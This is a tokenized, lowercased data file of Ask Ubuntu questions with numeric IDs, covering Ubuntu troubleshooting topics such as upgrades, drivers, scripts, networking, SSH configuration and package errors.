instabilities that i experienced with the nvidia drivers , but i ca n't figure out how to make it works . alessandro
480779	program like windows paint for cutting and copy editting	i tried pinta image editor but i ca n't make cut to images or copy small peices , i want a program like paint program on windows
480783	why does a bash-zenity script has that title on unity panel and that icon on unity launcher ?	i have this small bash script which helps use infinality font rendering options via a more user-friendly zenity window : http : //gnomefiles.org/content/show.php/infinality+style+changer ? content=161984 but whenever i launch it i have this `` color picker '' title on unity panel together with the icon assigned for `` color picker '' utility . i wonder why and how this is happening and how i can change it ? # ! /bin/bash # a simple script to provide a basic , zenity-based gui to change infinality style . # v.1.2 # infinality_current=`cat /etc/profile.d/infinality-settings.sh | grep `` use_style= '' | awk -f ' '' ' ' { print $ 2 } '` sudo_password= '' $ ( gksudo -- print-pass -- message 'provide permission to make system changes : enter your password to start or press cancel to quit . ' -- : 2 > /dev/null ) '' # check for null entry or cancellation . if [ [ $ { ? } ! = 0 || -z $ { sudo_password } ] ] then # add a zenity message here if you want . exit 4 fi # check that the password is valid . if ! sudo -ksp '' [ 1 ] < < < `` $ { sudo_password } '' 2 > /dev/null then # add a zenity message here if you want . exit 4 fi # menu ( ) { im= '' zenity -- width=500 -- height=490 -- list -- radiolist -- title=\ '' change infinality style\ '' -- text=\ '' current < i > infinality style < /i > is\ : < b > $ infinality_current < /b > \n✔ to < i > change < /i > it , select any other option below and press < b > ok < /b > \n✘ to < i > quit without changing < /i > , press < b > cancel < /b > \ '' `` im= $ im '' -- column=\ '' \ '' -- column \ '' options\ '' -- column \ '' description\ '' `` im= $ im '' false \ '' default\ '' \ '' use default settings - a compromise that should please most people\ '' `` im= $ im '' false \ '' osx\ '' \ '' simulate osx rendering\ '' `` im= $ im '' false \ '' ipad\ '' \ '' simulate ipad rendering\ '' `` im= $ im '' false \ '' ubuntu\ '' \ '' simulate ubuntu rendering\ '' `` im= $ im '' false \ '' linux\ '' \ '' generic linux style - no snapping or certain other tweaks\ '' `` im= $ im '' false \ '' windows\ '' \ '' simulate windows rendering\ '' `` im= $ im '' false \ '' win7\ '' \ '' simulate windows 7 rendering with normal glyphs\ '' `` im= $ im '' false \ '' winlight\ '' \ '' simulate windows 7 rendering with lighter glyphs\ '' `` im= $ im '' false \ '' vanilla\ '' \ '' just subpixel hinting\ '' `` im= $ im '' false \ '' classic\ '' \ '' infinality rendering circa 2010 - no snapping.\ '' `` im= $ im '' false \ '' nudge\ '' \ '' infinality - classic with lightly stem snapping and tweaks\ '' `` im= $ im '' false \ '' push\ '' \ '' infinality - classic with medium stem snapping and tweaks\ '' `` im= $ im '' false \ '' shove\ '' \ '' infinality - full stem snapping and tweaks without sharpening\ '' `` im= $ im '' false \ '' sharpened\ '' \ '' infinality - full stem snapping , tweaks , and windows-style sharpening\ '' `` im= $ im '' false \ '' infinality\ '' \ '' infinality - standard\ '' `` im= $ im '' false \ '' disabled\ '' \ '' act without extra infinality enhancements - just subpixel hinting\ '' `` } # option ( ) { choice=`echo $ im | sh -` # if echo $ choice | grep `` default '' > /dev/null ; then sudo -sp '' sed -i `` s/use_style=\ '' $ { infinality_current } \ '' /use_style=\ '' default\ '' /g '' '/etc/profile.d/infinality-settings.sh ' < < < `` $ { sudo_password } '' fi # if echo $ choice | grep `` osx '' > /dev/null ; then sudo -sp '' sed -i `` s/use_style=\ '' $ { infinality_current } \ '' /use_style=\ '' osx\ '' /g '' '/etc/profile.d/infinality-settings.sh ' < < < `` $ { sudo_password } '' fi # if echo $ choice | grep `` ipad '' > /dev/null ; then sudo -sp '' sed -i `` s/use_style=\ '' $ { infinality_current } \ '' /use_style=\ '' ipad\ '' /g '' '/etc/profile.d/infinality-settings.sh ' < < < `` $ { sudo_password } '' fi # if echo $ choice | grep `` ubuntu '' > /dev/null ; then sudo -sp '' sed -i `` s/use_style=\ '' $ { infinality_current } \ '' /use_style=\ '' ubuntu\ '' /g '' '/etc/profile.d/infinality-settings.sh ' < < < `` $ { sudo_password } '' fi # if echo $ choice | grep `` linux '' > /dev/null ; then sudo -sp '' sed -i `` s/use_style=\ '' $ { infinality_current } \ '' /use_style=\ '' linux\ '' /g '' '/etc/profile.d/infinality-settings.sh ' < < < `` $ { sudo_password } '' fi # if echo $ choice | grep `` windows '' > /dev/null ; then sudo -sp '' sed -i `` s/use_style=\ '' $ { infinality_current } \ '' /use_style=\ '' windows\ '' /g '' '/etc/profile.d/infinality-settings.sh ' < < < `` $ { sudo_password } '' fi # if echo $ choice | grep `` win7 '' > /dev/null ; then sudo -sp '' sed -i `` s/use_style=\ '' $ { infinality_current } \ '' /use_style=\ '' windows7\ '' /g '' '/etc/profile.d/infinality-settings.sh ' < < < `` $ { sudo_password } '' fi # if echo $ choice | grep `` winlight '' > /dev/null ; then sudo -sp '' sed -i `` s/use_style=\ '' $ { infinality_current } \ '' /use_style=\ '' windows7light\ '' /g '' '/etc/profile.d/infinality-settings.sh ' < < < `` $ { sudo_password } '' fi # if echo $ choice | grep `` vanilla '' > /dev/null ; then sudo -sp '' sed -i `` s/use_style=\ '' $ { infinality_current } \ '' /use_style=\ '' vanilla\ '' /g '' '/etc/profile.d/infinality-settings.sh ' < < < `` $ { sudo_password } '' fi # if echo $ choice | grep `` classic '' > /dev/null ; then sudo -sp '' sed -i `` s/use_style=\ '' $ { infinality_current } \ '' /use_style=\ '' classic\ '' /g '' '/etc/profile.d/infinality-settings.sh ' < < < `` $ { sudo_password } '' fi # if echo $ choice | grep `` nudge '' > /dev/null ; then sudo -sp '' sed -i `` s/use_style=\ '' $ { infinality_current } \ '' /use_style=\ '' nudge\ '' /g '' '/etc/profile.d/infinality-settings.sh ' < < < `` $ { sudo_password } '' fi # if echo $ choice | grep `` push '' > /dev/null ; then sudo -sp '' sed -i `` s/use_style=\ '' $ { infinality_current } \ '' /use_style=\ '' push\ '' /g '' '/etc/profile.d/infinality-settings.sh ' < < < `` $ { sudo_password } '' fi # if echo $ choice | grep `` shove '' > /dev/null ; then sudo -sp '' sed -i `` s/use_style=\ '' $ { infinality_current } \ '' /use_style=\ '' shove\ '' /g '' '/etc/profile.d/infinality-settings.sh ' < < < `` $ { sudo_password } '' fi # if echo $ choice | grep `` sharpened '' > /dev/null ; then sudo -sp '' sed -i `` s/use_style=\ '' $ { infinality_current } \ '' /use_style=\ '' sharpened\ '' /g '' '/etc/profile.d/infinality-settings.sh ' < < < `` $ { sudo_password } '' fi # if echo $ choice | grep `` infinality '' > /dev/null ; then sudo -sp '' sed -i `` s/use_style=\ '' $ { infinality_current } \ '' /use_style=\ '' infinality\ '' /g '' '/etc/profile.d/infinality-settings.sh ' < < < `` $ { sudo_password } '' fi # if echo $ choice | grep `` disabled '' > /dev/null ; then sudo -sp '' sed -i `` s/use_style=\ '' $ { infinality_current } \ '' /use_style=\ '' disabled\ '' /g '' '/etc/profile.d/infinality-settings.sh ' < < < `` $ { sudo_password } '' fi # } # menu option # if test $ { # choice } -gt 0 ; then echo `` operation completed '' fi # exit 0 the .desktop file `` /usr/local/share/applications/infinalitysettings.desktop '' contains the following text : [ desktop entry ] name=infinality style changer genericname=infinality settings exec=/usr/local/bin/infinalitysettings icon=gnome-settings-font terminal=false type=application categories=gtk ; gnome ; system ; settings ; fonts ; and here is the contents of `` /usr/share/applications/zenity-color-selection.desktop '' which has this title and icon : [ desktop entry ] encoding=utf-8 type=application categories=graphics ; 2dgraphics ; rastergraphics ; gtk ; name=color picker genericname=color picker comment=pick a color from palette or any color on your screen notshowin=kde ; icon=preferences-color # icon=applications-graphics exec=zenity -- color-selection -- show-palette terminal=false
480784	upgrade 13.10 to 14.04	i tried to upgrade to 14.04 and that came up , not sure what to do next . ruedi @ ruedi-xps-one-2710 : ~ $ sudo do-release-upgrade -d checking for a new ubuntu release err upgrade tool signature connection failed get:1 upgrade tool [ 4,403 kb ] fetched 4,403 kb in 6s ( 493 kb/s ) warning : root : file 'trusty.tar.gz.gpg ' missing failed to fetch fetching the upgrade failed . there may be a network problem . ruedi @ ruedi-xps-one-2710 : ~ $ can somebody help me with that ?
480787	home folder gone , unable to launch gui , unable to use root from command line	i have upgraded to 14.04 but on reboot i was unable to login to my account , it flashed some code for a second then returned to the login prompt . i can now login but it takes me to a completely blank screen and says home directory is not there . now when i go to command line i am also unable to use as root , says must be owned by uid 0 and have set uid set . please can someone help me here . thank you
480789	how to gain root access to uec image ?	when openstack creates an instance from a uec image ( using precise amd64 ) , the ssh public key is successfully injected via cloud-init and i 'm able to ssh into the instance via the ubuntu account , but when i attempt to use 'su ' or 'sudo ' it prompts for a password , which of course is n't yet defined . how can i gain root access without a password for the ubuntu or root users defined ?
480790	how to make master pdf editor the default for .pdf files	i want to make master pdf editor ( mpe ) the default for opening pdf files . i right-clicked a pdf file , chose properties > open with . mpe was not listed . i clicked show other applications but mpe was still not on the list . i tried opening the pdf file with mpe , editing , and then closing it . mpe still did not show up . so how do i make mpe the default program , or at least appear on the other programs or show other programs ?
480796	how to install recoll 's python : epub helper ?	i installed the latest version of recoll from the ppa because it was claimed it can index epub files . when i select `` show missing helpers '' there 's `` python : epub '' in the list . i can not find it in the software center . i already have the python-recoll package installed .
480805	brightness problem in ubuntu 14.04	whenever i turn on ubuntu brightness increases to 100 % always . i manually have to lower it to somewhat around 60 % .how to set it permanently to your choice , so that whenever i turn on ubuntu it remains 60 % ? thanks
480810	start & stop internet connexion without broking network manager	i am on precise . i used this command ( with an alias ) , to close the network , dbus-send -- system -- print-reply -- reply-timeout=120000 -- type=method_call -- dest=org.freedesktop.networkmanager /org/freedesktop/networkmanager org.freedesktop.networkmanager stop it worked , now i have to use dbus-send -- system -- print-reply -- reply-timeout=120000 -- type=method_call -- dest=org.freedesktop.networkmanager /org/freedesktop/networkmanager org.freedesktop.networkmanager.sleep boolean : true it work but not so well , sometimes i ca n't restart the network and networkmanager is blocked too and strange errors even gui freeze . what i need is a command line which close the network and do n't mess with network manager , maybe with the routing table or what else .
480812	grub not working after first access of windows .	i have just loaded ubuntu on a sony vaio running windows 8 . ubuntu was fin the first time , susequently only windows would load . i ran boot manager and grub was the boot page again and booted ubuntu fine . however , after selecting windows again only windows boots on start up ( grub does not load . i have tried this a couple of times and the results are consistant .
480813	after upgrading my ubuntu 13.10 to 14.04 , i constantly face internet connection disconnection	problem : my internet connection get disconnected constantly for a while , but it get resolved by itself after a while . situation : this happens after i upgrade my ubuntu os 13.10 to 14.04 and this problem only appear when i get connected to my office wifi . ( i do n't get this trouble at my home wifi ) clue : when i do a ping , i found this message when the internet connection is down : ping : sendmsg : no buffer space available could anybody help me to resolve this problem ? this problem is really annoying for me .
480821	how to get mutt to fetch only latest email ?	i have configured mutt according to the very helpful documentation at http : //www.bartbania.com/index.php/consolify-your-gmail-with-mutt/ . however , i have ran into some trouble because of my mail box size . my email inbox has about 20000 emails and every time mutt starts , it goes fetching headers for all of them , which is taking a lot of time and bandwidth . i am looking for a config to limit the number of messages fetched to a small number like 50 . i am going through mattguide but could n't find any config that does this work .
480822	apache apr_sockaddr_info_get ( ) failed error	my apache service is giving me error , i just used a snapshop on my aws cloud instance and everything seemed to be fine and my website was working until i restarted my apache and now it gives me the below error : ubuntu @ ip-10-0-0-217 : /var/www $ sudo service apache2 restart sudo : unable to resolve host ip-10-0-0-217 * restarting web server apache2 apache2 : apr_sockaddr_info_get ( ) failed for ip-10-0-0-217 apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.0.1 for servername ... waiting apache2 : apr_sockaddr_info_get ( ) failed for ip-10-0-0-217 apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.0.1 for servername on the user end they are getting this website is temporarily unavailable , please try again later . when they try to access the website . how can i fix this ?
480825	which software to use to make a jukebox cd on ubuntu ?	i would like to create a jukebox cd that i can play into my car . on windows , roxio software is used . a jukebox cd is a cd that has several folders and a supported filesystem type ( the cd player of my car can read the ones created by roxio ) . if i create a data cd using brasero then the audio cd player of my car ca n't read the files . i suppose it has something to do with the filesystem type that is used by brasero ( data cd ) .
480826	problem uploading to public ftp from ubuntu 12.04 lts 64-bit	i am having a strange issue when uploading from my computer to a ftp server ( web hosting ) . i 've connected with mc and with filezilla , i can log in to the ftp server , i can create/delete folders , i can delete files but when i try to upload any file , the transfer freezes at 0 % , 3 % , 1 % , randomly . i own a desktop computer ( dual boot - ubuntu 12.04 lts 64 bit and windows 7 x64 ) , which is connected by utp cable to the router , and a laptop , dell inspiron 1525 ( with ubuntu 12.04 lts 64 bit ) , connected to the wireless network . the router is an asus wl-520gc . both computers have static ips ( for port forwarding ) based on their mac addresses . the strange part is that from windows i can do anything i want on the ftp server ( upload any type of file ) , so the problem is only on ubuntu . maybe there is a problem with the network settings ? i 'm trying to solve this problem on the desktop , and maybe the solution will apply to the laptop as well . i 've looked in /etc/network/interfaces , where there was only auth lo iface lo inet loopback '' and changed to : auto eth0 iface eth0 inet static address 192.168.1.2 netmask 255.255.255.0 gateway 192.168.1.1 dns-nameservers 192.168.1.1 192.168.1.1 is the router 's ip address any suggestions for troubleshooting ? thank you
480828	can i change grub2 default os from livecd	i ca n't find anywhere on the internet that has this specific question . the problem for me is i forgot my pass for ubuntu 13.04 and now i ca n't use sudo commands . so now i need to change the boot and i cant do it . i want to make the default boot windows on grub2 . any ideas ? if worse comes to worse can i delete the ubuntu partitions from windows then repair the grub so it will only show the windows os . ideas , anyone ?
480837	juju local behind proxy	i am trying to use juju in local environment , on a vm running ubuntu 13.04 . the proxy settings for the machine to connect to the internet are set accordingly and are working . but when i try to bootstrap the juju environment i get the following error . error get http : //10.0.3.1:8040/provider-state : http : error connecting to proxy http : //my-proxy-address : port_no : dial tcp my-proxy-address : port_no : connection timed out i 'm not able to resolve this , any help would be appreciated .
480840	can i still use my windows 8 programs such as autocad , photoshop , sketch up with ubuntu ?	im not a computer geek , but i wish someone will help me to install the latest ubuntu os to my lenovo laptop with windows 8 pre installed . if i removed windows 8 as my os can i still use my other programs such as autocad , photoshop , sketch up with ubuntu ?
480841	scripting with variables from file	i have several videos on my pc that i would like to shorten . for instance i have a 30 sec video where i want to have the section from sec 15 to 20 ( a 5sec video ) . to cut this , i use avconv . avconv -i input.mp4 -ss 15 -acodec copy -vcodec copy -t 5 output.mp4 this command works pretty well . i have many videos i want to cut the same way . this is why i created a textfile containing the information : input-name , start of cut , length of cut , output-name . those are written into in.txt that looks like this : input.mp4 15 5 output.mp4 input1.mp4 32 10 output1.mp4 input2.mp4 10 7 output2.mp4 ... my question is : how do i have to modify the avconv-command to cut my videos automatically ? what i tried was this , but it did n't work at all : avconv -i $ 1 -ss $ 2 -acodec copy -vcodec copy -t $ 3 $ 4 < in.txt any idea ?
480842	xubuntu mouse+touchpad+keyboard not working	i have just installed a fresh 14.04 xubuntu machine , but : the resolution it 's really low . external mouse and keyboard are not working touchpad is not responding at all . i runned an apt-get update and a reboot , but the problems are still there . why is this happening ? i though in 2014 every problem of this kind were solved . ( in the other partition with ubuntu + xfce i dont have any of these problem ) .
480844	is it possible to change the xbmc video output to x11 ( xcb ) on xubuntu 14.04 ?	hello beloved community ! i was just wondering if it 's possible to change the xbmc output to x11 video output ( xcb ) , just like in vlc ? i 've searched all over the place , but ca n't seem to find any information about that . any help would be greatly appreciated ! have a nice day !
480846	how do i add a shortcut to refresh current page in firefox and keep the focus on current window ?	i 'm doing web development and for that reason i need to refresh some page in firefox frequently ( it 's on another display , so i see both ide and browser at the same time ) . at the moment i manually use the mouse to set focus to firefox , refresh it , and then put the focus back to ide . how can i add a keyboard shortcut that would make the currently active tab of a visible browser refresh the page , with focus staying where it currently is ?
480848	removed sound devices ?	i use ubuntu 12.10 with cinnamon gui . from time to time it asks me this strange question . of course i did not remove any hardware from my lenovo t420 . also i do n't have kde at all installed at all , so why does it say kde ? sounds still work though . several months ago i had a problem that sounds did not work , but not this time it seems , but i am not sure how will it look after restart .
480859	openvpn on ubuntu 14.04 : auto connect on startup	there are a lot of topics concerning this . openvpn auto connection by putting the conf file to /etc/openvpn just doesnt work . when using the authentification type `` password '' an easy way to make it work is : adding a shell script to /etc/networkmanager/dispatcher.d ( which is executed automatically on network acitivty ) # /bin/bash required_connection1_name= '' wlan0 '' required_connection2_name= '' eth0 '' vpn_connection_name= '' myvpn '' activ_con= $ ( nmcli con status | grep `` $ { required_connection1_name } \| $ { required_connection2_name } '' ) activ_vpn= $ ( nmcli con status | grep `` $ { vpn_connection_name } '' ) if [ `` $ { activ_con } '' -a ! `` $ { activ_vpn } '' ] ; then nmcli con up id `` $ { vpn_connection_name } '' fi since this causes an error saying the vpn-secret is missing , you have to change the connection config in /etc/networkmanager/system-connections/myvpn setting password-flags=0 and adding [ vpn-secrets ] password=mypassword now it works fine . my question is : is there a way to not put the password in clear text to a conf file . i know its only readable by root but cant i put like a key to it ?
480861	is there a guide step by step to use old libraries within a new system or new libraries with a old system for debootstrap or chroot ?	the response in here how to run hiphop with an old libc6 ( not solved ) and libc.so.6 : version `glibc_2.16 ' not found was so short ( for me , i am mid level linux user , not pro , because i do n't know how to use awk , i hate man pages because are in english and impossible to understand the real cases and examples , i fail to compile some programs etc ) . deboostrap seems to be a debian tool ( i am using ubuntu ) to build debians inside debians . i only want a small package of libraries , and how to do it . the man of deboostrap it is n't helpful . chroot also have been suggested to me , but i do n't find how to use it . for example : what commands to use ? how to `` prepare '' those libraries ? extracting from debs ? but debs have a structure that it is n't only libraries . and if it is a program itself ? what is the minim set up of chroot/shroot/deboostrap or whatever ? it will take gib 's ? thank you ps . barafu albino also said that i should use -- library path . i do n't know how to use that .
480864	ubuntu 12.04 failure to update	i am trying to update my ubuntu with `` sudo-apt-get update '' below is the error i am getting . kindly help me resolve . $ sudo apt-get update err http : //security.ubuntu.com precise-security release.gpg could not connect to 172.16.63.15:3128 ( 172.16.63.15 ) , connection timed out err http : //ppa.launchpad.net precise release.gpg could not connect to 172.16.63.15:3128 ( 172.16.63.15 ) , connection timed out err http : //ubuntu.mirror.ac.ke precise release.gpg could not connect to 172.16.63.15:3128 ( 172.16.63.15 ) , connection timed out err http : //ubuntu.mirror.ac.ke precise-security release.gpg unable to connect to 172.16.63.15:3128 : err http : //ubuntu.mirror.ac.ke precise-updates release.gpg unable to connect to 172.16.63.15:3128 : err http : //extras.ubuntu.com precise release.gpg could not connect to 172.16.63.15:3128 ( 172.16.63.15 ) , connection timed out err http : //archive.canonical.com precise release.gpg could not connect to 172.16.63.15:3128 ( 172.16.63.15 ) , connection timed out err http : //apt.insynchq.com raring release.gpg could not connect to 172.16.63.15:3128 ( 172.16.63.15 ) , connection timed out err http : //dl.google.com stable release.gpg could not connect to 172.16.63.15:3128 ( 172.16.63.15 ) , connection timed out err http : //toolbelt.heroku.com ./ release.gpg could not connect to 172.16.63.15:3128 ( 172.16.63.15 ) , connection timed out reading package lists ... done w : failed to fetch http : //ubuntu.mirror.ac.ke/ubuntu/dists/precise/release.gpg could not connect to 172.16.63.15:3128 ( 172.16.63.15 ) , connection timed out w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/precise/release.gpg could not connect to 172.16.63.15:3128 ( 172.16.63.15 ) , connection timed out w : failed to fetch http : //archive.canonical.com/dists/precise/release.gpg could not connect to 172.16.63.15:3128 ( 172.16.63.15 ) , connection timed out w : failed to fetch http : //apt.insynchq.com/ubuntu/dists/raring/release.gpg could not connect to 172.16.63.15:3128 ( 172.16.63.15 ) , connection timed out w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/release.gpg could not connect to 172.16.63.15:3128 ( 172.16.63.15 ) , connection timed out w : failed to fetch http : //ubuntu.mirror.ac.ke/ubuntu/dists/precise-security/release.gpg unable to connect to 172.16.63.15:3128 : w : failed to fetch http : //ubuntu.mirror.ac.ke/ubuntu/dists/precise-updates/release.gpg unable to connect to 172.16.63.15:3128 : w : failed to fetch http : //dl.google.com/linux/chrome/deb/dists/stable/release.gpg could not connect to 172.16.63.15:3128 ( 172.16.63.15 ) , connection timed out w : failed to fetch http : //toolbelt.heroku.com/ubuntu/./release.gpg could not connect to 172.16.63.15:3128 ( 172.16.63.15 ) , connection timed out w : failed to fetch http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu/dists/precise/release.gpg could not connect to 172.16.63.15:3128 ( 172.16.63.15 ) , connection timed out w : some index files failed to download . they have been ignored , or old ones used instead . w : duplicate sources.list entry http : //dl.google.com/linux/chrome/deb/ stable/main amd64 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-amd64_packages ) w : duplicate sources.list entry http : //dl.google.com/linux/chrome/deb/ stable/main i386 packages ( /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-i386_packages )
480865	ubuntu 12.04 -- php-config5 points to 5.3 instead 5.4	i have a problem installing a php extension ( phalcon framework ) due to having upgraded from php 5.3 to 5.4 some time ago . i upgraded using ondrej-php5-precise repository . everything is working ok and if i run phpinfo i get that the version is from cli : php 5.4.17-1~precise+1 ( cli ) ( built : jul 17 2013 18:14:06 ) from web : php version 5.4.17-1~precise+1 but if i run php-config5 -- version i get 5.3.10-1ubuntu3.11 and now when i try to install phalcon it compiles it for php5.3 instead of php5.4 . i 've read on the forums that i need to use the right phpize for 5.4 when building it . but i have two files phpize and phpize5 ( same for php-config and php-config5 ) and both point to php5.3 version stev
480866	install old qtcreator on ubuntu 14.04	i want to build my application on ubuntu . the last versions have been tested and programmed under windows , because it is a multiplatform application . sadly , under ubuntu the systray icon did not work as i tried to compile on ubuntu ( the icon appeared next to the launcher ) . the icon is a must-have for my application . i 've heard this comes from the version of qt , since 5.0 the sniqt that makes an appindicator would not work any more . so i figured , if i compile my application with qt 4.x , it must work . but how do i install this `` old '' version ?
480878	what are the alternatives for storing encrypted files on ubuntu now that truecrypt has ceased development ?	truecrypt seems to have suddenly , and strangely , become unavailable . i have some files that i would like to keep in a secure , encrypted area of my hard drive . truecrypt worked perfectly , so essentially i am looking for an equivalent . what options are there for encryption on my ubuntu computers now that truecrypt is no longer available ?
480882	can not install ubuntu 14.04 alongside windows 7	i have a desktop pc , a dual core 3.4ghz & 2gb of ram . hard disk is 250gb & is partitioned . when i proceed with the installation , i ca n't find any drive or partition in the partition list . therefore i can not complete the installation . i also already have windows 7 on the pc but while installing ubuntu , i do n't get the prompt that there is another os present .
480885	answer incoming calls automatically with skype for linux	how can skype for linux be set to answer incoming calls automatically ?
480887	backup of multiple server with snapshot	i have three server that i need to be able to pull backups from using rnsapshot and save backups to a single backup server . how would i do it ? so far all the guides i have read has one server in mind . i am also trying to find out whats the best way to backup an ubuntu server ? i would like to backup as much information as possible so that during a disaster i should be able to restore to my working state with minimum effort using rsnapshot . thanks for any help .
480888	is there analternate for unity in 14.04 ?	is there a way to put unity at the bottom of the screen or is there an alternative to unity ?
480890	wlan shows wifi , but not my personal router ssid	yesterday i installed ubuntu 14 . 04 on my notebook and had many troubles with it . installed ubuntu 14 . 04 configured everything how i like it ( minimal changes ) and then enabled in additional drivers new graphic drivers ( `` nvidia binary driver -version 331 . 38 '' ( propretiary , tested ) ) . the result was that ubuntu has been damaged and i could not boot etc . no solution of solving this problem i found on the forums worked for me . i used my previous clonezilla image and reinstalled ubuntu 14 . 04 . with the opensource drivers everything ok ( but it does not run as smooth as it does with the nvidia drivers ) . my notebook was running while i was not near it . when i came back my notebook was in sleep mode . after i pressed the power button it tells me that i am offline ( wi-fi ) . when i try to reconnect it shows really all wi-fi routers near me , but not my personal wi-fi router access . under `` more networks '' i ca n't find it too . when i go to dash and search for network there is a huge list of available networks , but not my own . when i switch to an other os with the same notebook i can find my wi-fi ssid . and i am sure that it will work again when i reinstall ubuntu again . but this would be the third time and i do n't want to reconfigure all again . so is there a solution for this problem ? hardware : acer aspire 5742g intel i5-450m nvidia geforce gt540m wi-fi : atheros ar5b97
480899	skype webcam wo n't work	i am a very new ubuntu 12.04 user and would like to install skype . it used to be available from ubuntu software centre but it is no longer available from there . so i downloaded it and installed same . the ubuntu sc installed section does not list it but ubuntu tweak does . skype works for sound only but no webcam = logitec quickcam express 046d:0928 . could you please help to make it work . according what i read it should work out of the box but it does not . your advise/help by email to belay @ btinternet.com would be most appreciated . kindest regards bela yorke
480900	rpm -q -- verify -- nouser -- nogroup -- nomode -- nomtime packagename	what is equivalent to following line in ubuntu / debian world ? note : i have original .deb files and i want to check which files differs from original zimbra-*.deb for z in $ ( rpm -qa | grep ^zimbra ) ; do echo `` checking $ z '' ; rpm -q -- verify -- nouser -- nogroup -- nomode -- nomtime $ z ; done this line grabbed from https : //wiki.zimbra.com/wiki/investigating_and_securing_systems
480901	remove ubuntu partition	i have dual booted my laptop with windows 7 and ubuntu 13.04 . now i want to remove my ubuntu partition . is there any way to remove ubuntu partition without casing any harm to my windows 7 ? i have tried to delete the ubuntu partition from my windows 7 but its not working . please suggest me the proper way to do it .
480908	problem with update-manager : no module named 'apt_pkg ' in ubuntu 13.10 , having installed python 3.4 on /usr/local/lib	i 'm rather new to ubuntu and i 'm trying to run update-manager on ubuntu.13.10 . i get : jacopo @ jacopo-laptop : ~ $ update-manager traceback ( most recent call last ) : file `` /usr/bin/update-manager '' , line 28 , in < module > from gi.repository import gtk file `` /usr/lib/python3/dist-packages/gi/__init__.py '' , line 27 , in < module > from ._gi import _api importerror : no module named 'gi._gi' error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python3/dist-packages/apport/__init__.py '' , line 5 , in < module > from apport.report import report file `` /usr/lib/python3/dist-packages/apport/report.py '' , line 30 , in < module > import apport.fileutils file `` /usr/lib/python3/dist-packages/apport/fileutils.py '' , line 23 , in < module > from apport.packaging_impl import impl as packaging file `` /usr/lib/python3/dist-packages/apport/packaging_impl.py '' , line 20 , in < module > import apt file `` /usr/lib/python3/dist-packages/apt/__init__.py '' , line 21 , in < module > import apt_pkg importerror : no module named 'apt_pkg' original exception was : traceback ( most recent call last ) : file `` /usr/bin/update-manager '' , line 28 , in < module > from gi.repository import gtk file `` /usr/lib/python3/dist-packages/gi/__init__.py '' , line 27 , in < module > from ._gi import _api importerror : no module named 'gi._gi' as far as i have understood , this is a problem related to the fact that i should have python3.4 installed . i installed it in /usr/local/ lib , but i always get the same error . in this way i ca n't even upgrade to ubuntu 14.04 . could someone help me ? thanks in advance ! jacopo
480913	grant ssh access to subfolder which is owned by root	i have a folder /srv/jarvis which has punch of subfolder and on of them is called carl ( /srv/jarvis/carl ) jarvis dir has these rights drwxrwxrwx 12 root root 4096 jun 9 11:34 jarvis and carl has these rights drwxr-xr-x 4 carl carl 4096 jun 9 13:02 carl in the /etc/ssh/sshd_config i have added these lines match user carl chrootdirectory /srv/jarvis/carl forcecommand internal-sftp allowtcpforwarding no x11forwarding no but if i add those lines and do service ssh restart then the user cant login into that server write fails : broken pipe . and if remove tose lines from sshd_config he can login again but i dont want that i want that the use can access only to /srv/jarvis/carl/ and do there what ever he wants also he cant do any of the root stuff : ) how can i fix thoes problems
480914	ubuntu < libappindicator/app-indicator.h > file missing	according to http : //stackoverflow.com/questions/17193307/qt-systray-icon-appears-next-to-launcher-on-ubuntu-instead-of-on-the-panel i want to make a systray icon . but i ca n't install the package libappindicator-dev because this file http : //de.archive.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.5.2-1ubuntu2.1_amd64.deb is missing . so i ca n't include the needed header . how can one fix this ?
480918	built in webcam installation	i am following instructions to install a built in webcam . the instructions state i have to install cheese , but every time after entering the command and my password , an error appear : unable to locate package cheese . this is what it shows every time : wtc @ ubuntu : ~ $ sudo apt-get install cheese [ sudo ] password for wtc : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package cheese wtc @ ubuntu : ~ $
480919	backup and restore user passwords	is it possible to make a file copy to backup users password and then restore them by copying them back ? it seems that the file in question is /etc/shadow as per http : //en.wikipedia.org/wiki/passwd # shadow_file my intention is to temporary change a users password , sudo passwd user . the original password is unknown to me . i would then restore it to the original password by replacing the /etc/shadow file with the previous copy . i.e . sudo cp /etc/shadow /etc/shadow.backup sudo passwd user sudo cp /etc/shadow.backup /etc/shadow sudo rm /etc/shadow.backup is this possible or will i ruin the account ?
480920	why 'scheduled tasks ' ( gnome-schedule ) window does n't show ?	scheduled tasks on ubuntu 14.04 trusty : scheduled task ( gnome-schedule ) was running fine until i tried to add some root tasks . after that the application window doesnt open anymore for a user . running the application as root ( gksu gnome-schedule ) does open the window . a task ( as root ) can be added but the task is not executed as scheduled . it does run however when executed manually . removing and reinstalling the app does n't help . below the terminal output after running the app from the terminal : trusty @ ubuntu : ~ $ gnome-schedule /usr/share/gnome-schedule/gnome-schedule.py:72 : warning : attempt to add property gnomeprogram : :sm-connect after class was initialised pr = gnome.program_init ( `` gnome-schedule '' , config.getversion ( ) , properties=props ) /usr/share/gnome-schedule/gnome-schedule.py:72 : warning : attempt to add property gnomeprogram : :show-crash-dialog after class was initialised pr = gnome.program_init ( `` gnome-schedule '' , config.getversion ( ) , properties=props ) /usr/share/gnome-schedule/gnome-schedule.py:72 : warning : attempt to add property gnomeprogram : :display after class was initialised pr = gnome.program_init ( `` gnome-schedule '' , config.getversion ( ) , properties=props ) /usr/share/gnome-schedule/gnome-schedule.py:72 : warning : attempt to add property gnomeprogram : :default-icon after class was initialised pr = gnome.program_init ( `` gnome-schedule '' , config.getversion ( ) , properties=props ) no crontab for trusty traceback ( most recent call last ) : file `` /usr/share/gnome-schedule/gnome-schedule.py '' , line 74 , in < module > mainwindow = mainwindow.main ( debug_flag , false , pr , manual_poscorrect ) file `` /usr/share/gnome-schedule/mainwindow.py '' , line 257 , in __init__ self.schedule_reload ( ) file `` /usr/share/gnome-schedule/mainwindow.py '' , line 308 , in schedule_reload data = self.at.read ( ) 